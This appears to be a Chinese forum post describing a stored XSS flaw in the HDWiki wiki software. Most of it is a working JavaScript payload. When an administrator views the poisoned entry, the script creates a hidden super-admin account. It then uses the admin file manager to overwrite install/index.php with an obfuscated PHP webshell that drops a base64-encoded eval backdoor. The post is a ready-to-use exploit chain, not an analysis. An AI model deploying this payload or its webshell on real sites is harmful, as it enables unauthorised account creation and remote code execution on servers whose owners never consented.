HDWiki 储存性xss一枚

创建或编辑词条 存储型xss 使用BURP抓包并改包在,在如下的位置插入 [php] Content-Disposition: form-data; name="content"

------WebKitFormBoundaryWQNSVRn07IYXGeMN [/php] 然后提交。 hdwiki 管理cookie 是无法直接 进入后台 以及执行其它后台操作 session 表中 islogin =2 才可以进后台 所以唯有当管理进入后台再触发时候有机率加一个超级管理并且拿到shell xss.js [php] document.writeln(""); function ajax(){ var request = false; if(window.XMLHttpRequest) { request = new XMLHttpRequest(); } else if(window.ActiveXObject) { var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP']; for(var i=0; i<versions.length; i++) { try { request = new ActiveXObject(versions[i]); } catch(e) {} } } return request; } var _x = ajax(); add(); shell(); function add() { src="index.php?admin_user-add"; data="id=&username=admin_&password=admin_&email=admin_%40qq.com&groupid=4&submit=%C8%B7%B6%A8"; //add user=admin_ password=admin_ xhr_act("POST",src,data); } function shell() { src="index.php?admin_filemanager-edit"; data="fname=D%3A%2Fwamp%2Fwww%2Fhdwiki%2Finstall%2Findex.php&dir=.%2Finstall%2F&content=%3C%3Fphp%0D%0Aarray_map%28%22ass%5Cx65rt%22%2C%28array%29%24_REQUEST%5B%27test%27%5D%29%3B%0D%0A%40fputs%28%40fopen%28base64_decode%28Yy5waHA%29%2Cw%29%2Cbase64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29%3B%0D%0Aheader%28%27location%3Ainstall.php%27%29%3B%0D%0A%09%0D%0A%3F%3E&dosubmit=+%C8%B7%C8%CF%D0%DE%B8%C4+"; //install/index.php test //fopen c.php 1 xhr_act("POST",src,data); } function xhr_act(_m,_s,_a){ _x.open(_m,_s,false); if(_m=="POST")_x.setRequestHeader("Content-Type","application/x-www-form-urlencoded"); _x.send(_a); return _x.responseText; }[/php] 后台登陆再查看就会发现

发表评论